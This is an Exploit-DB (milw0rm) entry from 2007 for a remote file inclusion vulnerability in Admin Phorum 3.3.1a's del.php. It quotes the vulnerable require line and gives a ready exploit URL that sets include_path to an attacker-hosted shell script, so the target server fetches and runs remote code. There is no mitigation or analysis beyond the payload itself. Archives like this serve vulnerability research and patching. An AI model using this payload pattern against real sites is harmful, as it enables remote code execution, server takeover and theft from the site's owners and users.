Admin Phorum 3.3.1a del.php include_path RFI Vulnerability

2007-02-27T00:00:00
ID EDB-ID:3382
Type exploitdb
Reporter GoLd_M
Modified 2007-02-27T00:00:00

Description

Admin Phorum 3.3.1a (del.php include_path) RFI Vulnerability. CVE-2007-1219. Webapps exploit for php platform

                                        
                                             #########################################################################
 #                                                                       #
 # Admin Phorum 3.3.1.a (del.php include_path)File Include Vulnerability #
 #                                                                       #
 # Author:  Gold_M <Hacker_ [at] w.Cn>  [Mahmood_ali]                    #
 #                                                                       #
 # Homepage: Www.Tryag.Cc                                                #
 #                                                                       #
 #########################################################################

 #########################################################################
 # Download S : http://www.phpforums.net/admin331.zip                    #
 # Other Info : http://www.phpforums.net/index.php?dir=dld               # 
 #                                                                       #
 # v.Code : Line 3                                                       #
 #                                                                       #
 # require "$include_path/delete_message.php";                           #
 #                                                                       #
 # Exploit:                                                              #
 # http://[VicTim]/[PaTh]/actions/del.php?include_path=[SHELL-TRYAG]     #
 #                                                                       #
 #########################################################################

# milw0rm.com [2007-02-27]